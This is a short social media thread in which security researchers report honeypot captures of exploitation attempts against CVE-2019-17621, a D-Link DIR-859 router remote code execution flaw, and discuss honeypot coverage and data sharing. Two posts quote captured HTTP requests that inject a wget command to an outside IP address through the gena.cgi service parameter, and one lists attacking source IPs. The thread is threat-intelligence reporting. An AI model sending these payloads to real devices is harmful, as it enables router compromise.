Niels Heinen

Suddenly seeing exploitation attempts of CVE-2019-17621 (D-Link DIR-859 Wi-Fi router RCE). In 3 years of running my Lophiid honeypots, this is the first time I see this specific vuln being exploited.

An example request:

SUBSCRIBE /gena.cgi?service=`echo ; wget http://185.93.89.75/81_CAJ0BIC0CCF0BJA_CVE-2019-17621 -O /dev/null; echo >` HTTP/1.1
Host: x.x.x.x
Callback: <http://192.168.0.2:1337/ServiceProxy0>
Connection: close
Nt: upnp:event
Timeout: Second-1800
User-Agent: Mozilla/1.0

#honeypot #dfir #infosec #cybersecurity #threatintel

Jan 26 at 12:47pmWeb
Show threadhrbrmstr πŸ‡ΊπŸ‡¦ πŸ‡¬πŸ‡± πŸ‡¨πŸ‡¦Jan 26

@heinen we get SUBSCRIBE's in from generic D-Link / TRENDnet gena.cgi Buffer Overflow Attempts all the time

```
${SENSOR_IP}/gena.cgi?service=`echo ; wget http://185.93.89.75/81_DI0EI0A0CDC_CVE-2019-17621 -O /dev/null; echo >`
```

Most of the hits from: 192.159.99.95
Alot from: 185.93.89.75
Tiny amt from: 146.70.117.104

May need to see if @iagox86 thinks if that CVE fits too for this.

Show threadNiels HeinenJan 26

@hrbrmstr @iagox86 interesting!

Interesting! Thanks for sharing.

So I only have 50 honeypots (for personal entertainment) and guess you guys have quite a few more than that :). More importantly, I have them across 6 datacenters which really limits the coverage.

But I'm not complaining: I get more data than I can handle and have fun playing with it (and trying to extract new info in new ways when possible)

Show threadhrbrmstr πŸ‡ΊπŸ‡¦ πŸ‡¬πŸ‡± πŸ‡¨πŸ‡¦Jan 26

@heinen just say the word and you can be in "Spacewar" (a really bad codename for multiplayer greynoise) and get our take on Arkime's UX and all the PCAPs from your nodes. plus our tagging pipeline run on your PCAPs.

wld not even require modifying your setup too much.

(fixed the img)